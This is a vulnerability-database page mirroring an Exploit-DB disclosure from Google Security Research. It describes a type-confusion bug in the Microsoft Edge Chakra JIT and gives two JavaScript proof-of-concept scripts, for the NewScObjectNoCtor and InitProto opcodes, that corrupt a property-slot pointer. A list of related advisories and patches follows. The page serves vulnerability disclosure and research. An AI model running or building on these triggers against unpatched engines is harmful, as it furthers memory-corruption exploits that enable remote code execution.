Lucene search
Google Security ResearchEDB-ID:46203HistoryJan 18, 2019 - 12:00 a.m.
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
2019-01-1800:00:00
Google Security Research
www.exploit-db.com
39
AI Score
7.4
Confidence
Low
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__: proto};
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, {}, {});
}
let o = {a: 1, b: 2};
opt(o, o, 0x1234);
print(o.a);
}
main();Related
zdt
zdt
Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion
2019-03-04 00:00:00
Microsoft Edge Chakra - InitClass Type Confusion Exploit
2019-01-20 00:00:00
nvd
nvd
osv
osv
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
ChakraCore RCE Vulnerability
2022-05-13 01:21:15
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
prion
prion
Remote code execution
2019-01-08 21:29:00
Remote code execution
2019-01-08 21:29:00
Remote code execution
2019-01-08 21:29:00
cve
cve
github
github
ChakraCore RCE Vulnerability
2022-05-13 01:21:15
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
cvelist
cvelist
veracode
veracode
Remote Code Execution (RCE)
2019-01-09 03:01:06
Remote Code Execution (RCE)
2019-01-09 02:32:58
githubexploit
githubexploit
Exploit for Out-of-bounds Write in Microsoft
2019-07-12 13:06:17
mscve
mscve
Chakra Scripting Engine Memory Corruption Vulnerability
2019-01-08 08:00:00
Chakra Scripting Engine Memory Corruption Vulnerability
2019-01-08 08:00:00
symantec
symantec
packetstorm
packetstorm
Microsoft Edge Chakra 1.11.4 Type Confusion
2019-03-04 00:00:00
Microsoft Edge Chakra JIT NewScObjectNoCtor / InitProto Type Confusion
2019-01-17 00:00:00
exploitpack
exploitpack
Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion
2019-03-04 00:00:00
exploitdb
exploitdb
Microsoft Edge Chakra - 'InitClass' Type Confusion
2019-01-18 00:00:00
Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion
2019-03-04 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2019-0539)
2019-01-08 00:00:00
Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2019-0567)
2019-01-08 00:00:00
kaspersky
kaspersky
KLA11397 Multiple vulnerabilities in Microsoft Browsers
2019-01-08 00:00:00
threatpost
threatpost
Microsoft Issues Multiple Critical Patches for Edge Browser
2019-01-08 20:49:06
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4480962)
2019-01-09 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4480961)
2019-01-09 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4480973)
2019-01-09 00:00:00
mskb
mskb
January 8, 2019âKB4480962 (OS Build 10240.18094)
2019-01-08 08:00:00
January 8, 2019âKB4480961 (OS Build 14393.2724)
2019-01-08 08:00:00
January 8, 2019âKB4480978 (OS Build 16299.904)
2019-01-08 08:00:00
nessus
nessus
KB4480962: Windows 10 January 2019 Security Update
2019-01-08 00:00:00
KB4480961: Windows 10 Version 1607 and Windows Server 2016 January 2019 Security Update
2019-01-08 00:00:00
KB4480973: Windows 10 Version 1703 January 2019 Security Update
2019-01-08 00:00:00
talosblog
talosblog